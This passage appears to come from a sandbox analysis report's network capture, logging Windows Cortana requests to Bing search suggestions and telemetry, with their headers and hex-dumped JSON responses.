                                                                                                              Data Ascii: ionStart,i),yt=t(o.connectEnd,i),pt=t(o.requestStart,i),wt=t(o.responseStart,i),bt=t(o.responseEnd,i),ot=null,st=n.layout();for(tt=0;tt<st.length;tt++){var b=st[tt],dt=b._e,ht=b._s;if(ht&&g===ht){ot=b.i;b.x<h.w&&b.y<h.h&&(f=et);break}}rt={_r:o,t:et,i:p.le


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              12192.168.2.1649721204.79.197.200443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:25 UTC2233OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                              Origin: https://www.bing.com
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              Content-type: text/xml
                                                                                                              X-Agent-DeviceId: 01000A4109009A83
                                                                                                              X-BM-CBT: 1729887742
                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                              X-BM-DeviceDimensions: 784x640
                                                                                                              X-BM-DeviceDimensionsLogical: 784x640
                                                                                                              X-BM-DeviceScale: 100
                                                                                                              X-BM-DTZ: -240
                                                                                                              X-BM-Market: CH
                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                              X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
                                                                                                              X-Device-ClientSession: 03BBCBA1937A4CF7B4AD5C321610FE95
                                                                                                              X-Device-isOptin: false
                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                              X-Device-OSSKU: 48
                                                                                                              X-Device-Touch: false
                                                                                                              X-DeviceID: 01000A4109009A83
                                                                                                              X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2
                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                              X-PositionerType: Desktop
                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                              X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
                                                                                                              X-UserAgeClass: Unknown
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: www.bing.com
                                                                                                              Content-Length: 24895
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                              2024-10-25 20:22:25 UTC16355OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 45 31 45 30 38 35 41 42 31 46 43 39 34 36 34 43 39 43 38 42 32 43 43 39 38 42 45 43 38 42 33 41 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 51 46 50 65 72 66 50 69 6e 67 22 2c 22 53 54 22 3a 22
                                                                                                              Data Ascii: <ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.ClientInst</T><IG>E1E085AB1FC9464C9C8B2CC98BEC8B3A</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.QFPerfPing","ST":"
                                                                                                              2024-10-25 20:22:25 UTC8540OUTData Raw: 49 44 22 3a 22 42 32 44 43 36 36 30 31 36 31 37 38 34 33 37 39 42 33 31 31 37 41 38 43 38 43 45 43 31 32 41 31 22 2c 22 43 6f 72 74 61 6e 61 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 22 4e 6f 6e 65 22 2c 22 49 6d 70 72 65 73 73 69 6f 6e 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 51 46 5f 4b 45 59 53 54 52 4f 4b 45 5f 56 49 52 54 55 41 4c 5f 55 52 4c 3f 71 72 79 3d 6e 6f 26 73 65 74 6c 61 6e 67 3d 65 6e 2d 43 48 26 63 63 3d 43 48 26 6e 6f 68 73 3d 31 26 71 66 6d 3d 31 26 63 70 3d 32 26 63 76 69 64 3d 64 36 35 63 32 36 62 31 39 61 65 65 34 63 36 35 62 61 64 66 34 32 36 34 39 62 36 34 62 64 63 34 26 69 67 3d 62 39 61 65 38 37 66 65 30 62 66 31 34 62 62 66 61 65 30 36 39 64 38 35 31 61 66 62 62 35 35 64 26 41 53 49 6e 69
                                                                                                              Data Ascii: ID":"B2DC660161784379B3117A8C8CEC12A1","CortanaCapabilities":"None","ImpressionUrl":"https://www.bing.com/QF_KEYSTROKE_VIRTUAL_URL?qry=no&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=d65c26b19aee4c65badf42649b64bdc4&ig=b9ae87fe0bf14bbfae069d851afbb55d&ASIni
                                                                                                              2024-10-25 20:22:25 UTC426INHTTP/1.1 204 No Content
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              X-MSEdge-Ref: Ref A: 5DB2562257DF49EE8BE5ECC4E48BCF6C Ref B: DFW30EDGE0421 Ref C: 2024-10-25T20:22:25Z
                                                                                                              Date: Fri, 25 Oct 2024 20:22:25 GMT
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              13192.168.2.1649718204.79.197.200443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:25 UTC2343OUTGET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=n&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=d65c26b19aee4c65badf42649b64bdc4&ig=255fd2e3c36e408db16aa032974197e2 HTTP/1.1
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              X-Agent-DeviceId: 01000A4109009A83
                                                                                                              X-BM-CBT: 1729887742
                                                                                                              X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore
                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                              X-BM-DeviceDimensions: 784x640
                                                                                                              X-BM-DeviceDimensionsLogical: 784x640
                                                                                                              X-BM-DeviceScale: 100
                                                                                                              X-BM-DTZ: -240
                                                                                                              X-BM-Market: CH
                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                              X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
                                                                                                              X-Device-ClientSession: 03BBCBA1937A4CF7B4AD5C321610FE95
                                                                                                              X-Device-isOptin: false
                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                              X-Device-OSSKU: 48
                                                                                                              X-Device-Touch: false
                                                                                                              X-DeviceID: 01000A4109009A83
                                                                                                              X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2
                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                              X-PositionerType: Desktop
                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                              X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
                                                                                                              X-UserAgeClass: Unknown
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: www.bing.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                              2024-10-25 20:22:25 UTC1188INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Content-Length: 6483
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Expires: -1
                                                                                                              P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                              Set-Cookie: _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                                              Set-Cookie: MUIDB=5047E5942BB2460EA35B53CCF78DDB3D; expires=Wed, 19-Nov-2025 20:22:25 GMT; path=/; HttpOnly
                                                                                                              X-EventID: 671bfe014ee548778f64b8c36c2a1ef8
                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              X-MSEdge-Ref: Ref A: DD677915BA6D4CC296060F932E47817D Ref B: DFW30EDGE1719 Ref C: 2024-10-25T20:22:25Z
                                                                                                              Date: Fri, 25 Oct 2024 20:22:25 GMT
                                                                                                              Connection: close
                                                                                                              2024-10-25 20:22:25 UTC1104INData Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 65 74 66 6c 69 78 5c 75 30 30 32 36 66 69
                                                                                                              Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=netflix\u0026fi
                                                                                                              2024-10-25 20:22:25 UTC2025INData Raw: 25 33 61 25 32 32 34 63 34 38 38 35 32 34 2d 36 63 32 30 2d 32 36 64 64 2d 34 34 62 61 2d 66 38 36 38 34 36 63 31 32 66 32 36 25 32 32 5c 75 30 30 32 36 61 73 62 65 3d 41 53 22 2c 22 71 75 65 72 79 22 3a 22 6e 65 73 70 72 65 73 73 6f 22 2c 22 73 74 79 70 65 22 3a 22 4d 42 22 2c 22 68 63 22 3a 22 31 22 2c 22 68 63 73 22 3a 22 30 22 2c 22 69 73 41 6e 73 77 65 72 22 3a 22 31 22 2c 22 61 73 62 74 79 70 65 22 3a 22 41 53 22 2c 22 61 64 64 69 74 69 6f 6e 61 6c 49 6e 66 6f 54 65 78 74 22 3a 22 4b 61 66 66 65 65 28 2d 6b 61 70 73 65 6c 6e 29 20 76 6f 6e 20 4e 65 73 74 6c c3 a9 22 2c 22 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 55 72 6c 22 3a 22 2f 74 68 3f 69 64 3d 4f 53 4b 2e 37 36 35 38 63 32 34 64 32 39 38 66 35 61 62 30 34 34 38 31 37 39 36 31 61 36 35 38 62 30
                                                                                                              Data Ascii: %3a%224c488524-6c20-26dd-44ba-f86846c12f26%22\u0026asbe=AS","query":"nespresso","stype":"MB","hc":"1","hcs":"0","isAnswer":"1","asbtype":"AS","additionalInfoText":"Kaffee(-kapseln) von Nestl","secondaryIconUrl":"/th?id=OSK.7658c24d298f5ab044817961a658b0
                                                                                                              2024-10-25 20:22:25 UTC3354INData Raw: 66 69 6c 74 65 72 73 3d 75 66 6e 25 33 61 25 32 32 4e 6f 72 64 56 50 4e 25 32 32 2b 73 69 64 25 33 61 25 32 32 66 61 62 37 62 65 30 36 2d 39 63 38 39 2d 38 61 61 66 2d 34 62 31 36 2d 30 35 31 36 62 37 33 39 66 34 65 39 25 32 32 5c 75 30 30 32 36 61 73 62 65 3d 41 53 22 2c 22 71 75 65 72 79 22 3a 22 6e 6f 72 64 76 70 6e 22 2c 22 73 74 79 70 65 22 3a 22 4d 42 22 2c 22 68 63 22 3a 22 31 22 2c 22 68 63 73 22 3a 22 30 22 2c 22 69 73 41 6e 73 77 65 72 22 3a 22 31 22 2c 22 61 73 62 74 79 70 65 22 3a 22 41 53 22 2c 22 61 64 64 69 74 69 6f 6e 61 6c 49 6e 66 6f 54 65 78 74 22 3a 22 56 50 4e 2d 41 6e 62 69 65 74 65 72 22 2c 22 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 55 72 6c 22 3a 22 2f 74 68 3f 69 64 3d 4f 53 4b 2e 37 35 62 36 39 34 37 61 36 33 66 66 63 35 65 66 61
                                                                                                              Data Ascii: filters=ufn%3a%22NordVPN%22+sid%3a%22fab7be06-9c89-8aaf-4b16-0516b739f4e9%22\u0026asbe=AS","query":"nordvpn","stype":"MB","hc":"1","hcs":"0","isAnswer":"1","asbtype":"AS","additionalInfoText":"VPN-Anbieter","secondaryIconUrl":"/th?id=OSK.75b6947a63ffc5efa


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              14192.168.2.1649719204.79.197.200443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:25 UTC2345OUTGET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=not&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=d65c26b19aee4c65badf42649b64bdc4&ig=a2f0055f6109415bbee1573a5e0f2c13 HTTP/1.1
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              X-Agent-DeviceId: 01000A4109009A83
                                                                                                              X-BM-CBT: 1729887742
                                                                                                              X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore
                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                              X-BM-DeviceDimensions: 784x640
                                                                                                              X-BM-DeviceDimensionsLogical: 784x640
                                                                                                              X-BM-DeviceScale: 100
                                                                                                              X-BM-DTZ: -240
                                                                                                              X-BM-Market: CH
                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                              X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
                                                                                                              X-Device-ClientSession: 03BBCBA1937A4CF7B4AD5C321610FE95
                                                                                                              X-Device-isOptin: false
                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                              X-Device-OSSKU: 48
                                                                                                              X-Device-Touch: false
                                                                                                              X-DeviceID: 01000A4109009A83
                                                                                                              X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2
                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                              X-PositionerType: Desktop
                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                              X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
                                                                                                              X-UserAgeClass: Unknown
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: www.bing.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                              2024-10-25 20:22:25 UTC1188INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Content-Length: 7117
                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                              Expires: -1
                                                                                                              P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                              Set-Cookie: _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                                              Set-Cookie: MUIDB=5047E5942BB2460EA35B53CCF78DDB3D; expires=Wed, 19-Nov-2025 20:22:25 GMT; path=/; HttpOnly
                                                                                                              X-EventID: 671bfe01cc3d40ba9beb71cd347f3aa7
                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              X-MSEdge-Ref: Ref A: 2E22D2D30C8748B0AA03CAC08304D0F7 Ref B: DFW30EDGE0116 Ref C: 2024-10-25T20:22:25Z
                                                                                                              Date: Fri, 25 Oct 2024 20:22:25 GMT
                                                                                                              Connection: close
                                                                                                              2024-10-25 20:22:25 UTC1145INData Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 6f 74 69 6f 6e 5c 75 30 30 32 36 66 69 6c
                                                                                                              Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=notion\u0026fil
                                                                                                              2024-10-25 20:22:25 UTC1984INData Raw: 64 5c 75 30 30 32 36 77 3d 38 30 5c 75 30 30 32 36 68 3d 38 30 5c 75 30 30 32 36 71 6c 74 3d 39 30 5c 75 30 30 32 36 63 3d 36 5c 75 30 30 32 36 72 73 3d 31 5c 75 30 30 32 36 63 64 76 3d 31 5c 75 30 30 32 36 70 69 64 3d 52 53 22 2c 22 73 65 67 6d 65 6e 74 73 22 3a 22 47 65 6e 65 72 69 63 22 7d 2c 22 54 65 78 74 22 3a 22 4e 6f 74 65 70 61 64 2b 2b 22 2c 22 48 69 67 68 43 6f 6e 66 69 64 65 6e 63 65 4d 65 74 61 53 75 67 67 65 73 74 69 6f 6e 53 63 6f 72 65 22 3a 30 2c 22 50 72 65 66 65 74 63 68 43 6f 6e 66 69 64 65 6e 63 65 53 63 6f 72 65 22 3a 30 2c 22 43 68 69 6c 64 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 54 65 78 74 22 3a 22 c3 9c 62 65 72 73 69 63 68 74 22 2c 22 53 65 63 6f 6e 64 61 72 79 54 65 78 74 22 3a 22 22 2c 22 55 72 6c 22 3a 22 2f 73 65 61
                                                                                                              Data Ascii: d\u0026w=80\u0026h=80\u0026qlt=90\u0026c=6\u0026rs=1\u0026cdv=1\u0026pid=RS","segments":"Generic"},"Text":"Notepad++","HighConfidenceMetaSuggestionScore":0,"PrefetchConfidenceScore":0,"ChildSuggestions":[{"Text":"bersicht","SecondaryText":"","Url":"/sea
                                                                                                              2024-10-25 20:22:25 UTC3988INData Raw: 3f 71 3d 6e 6f 74 69 6e 6f 5c 75 30 30 32 36 66 69 6c 74 65 72 73 3d 75 66 6e 25 33 61 25 32 32 4e 6f 74 69 6e 6f 25 32 32 2b 73 69 64 25 33 61 25 32 32 64 34 62 30 65 33 62 61 2d 61 37 37 62 2d 33 65 34 37 2d 63 63 31 64 2d 64 62 64 33 65 35 38 66 64 61 30 37 25 32 32 5c 75 30 30 32 36 61 73 62 65 3d 41 53 22 2c 22 71 75 65 72 79 22 3a 22 6e 6f 74 69 6e 6f 22 2c 22 73 74 79 70 65 22 3a 22 4d 42 22 2c 22 68 63 22 3a 22 31 22 2c 22 68 63 73 22 3a 22 30 22 2c 22 69 73 41 6e 73 77 65 72 22 3a 22 31 22 2c 22 61 73 62 74 79 70 65 22 3a 22 41 53 22 2c 22 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 55 72 6c 22 3a 22 2f 74 68 3f 69 64 3d 4f 53 4b 2e 62 63 66 66 31 61 64 34 31 62 63 65 63 39 65 39 32 61 61 61 35 31 64 30 61 66 33 64 32 62 39 31 5c 75 30 30 32 36 77 3d
                                                                                                              Data Ascii: ?q=notino\u0026filters=ufn%3a%22Notino%22+sid%3a%22d4b0e3ba-a77b-3e47-cc1d-dbd3e58fda07%22\u0026asbe=AS","query":"notino","stype":"MB","hc":"1","hcs":"0","isAnswer":"1","asbtype":"AS","secondaryIconUrl":"/th?id=OSK.bcff1ad41bcec9e92aaa51d0af3d2b91\u0026w=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              15192.168.2.1649720204.79.197.200443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:25 UTC2344OUTGET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=no&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=d65c26b19aee4c65badf42649b64bdc4&ig=b9ae87fe0bf14bbfae069d851afbb55d HTTP/1.1
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              X-Agent-DeviceId: 01000A4109009A83
                                                                                                              X-BM-CBT: 1729887742
                                                                                                              X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore
                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                              X-BM-DeviceDimensions: 784x640
                                                                                                              X-BM-DeviceDimensionsLogical: 784x640
                                                                                                              X-BM-DeviceScale: 100
                                                                                                              X-BM-DTZ: -240
                                                                                                              X-BM-Market: CH
                                                                                                              X-BM-Theme: 000000;0078d7
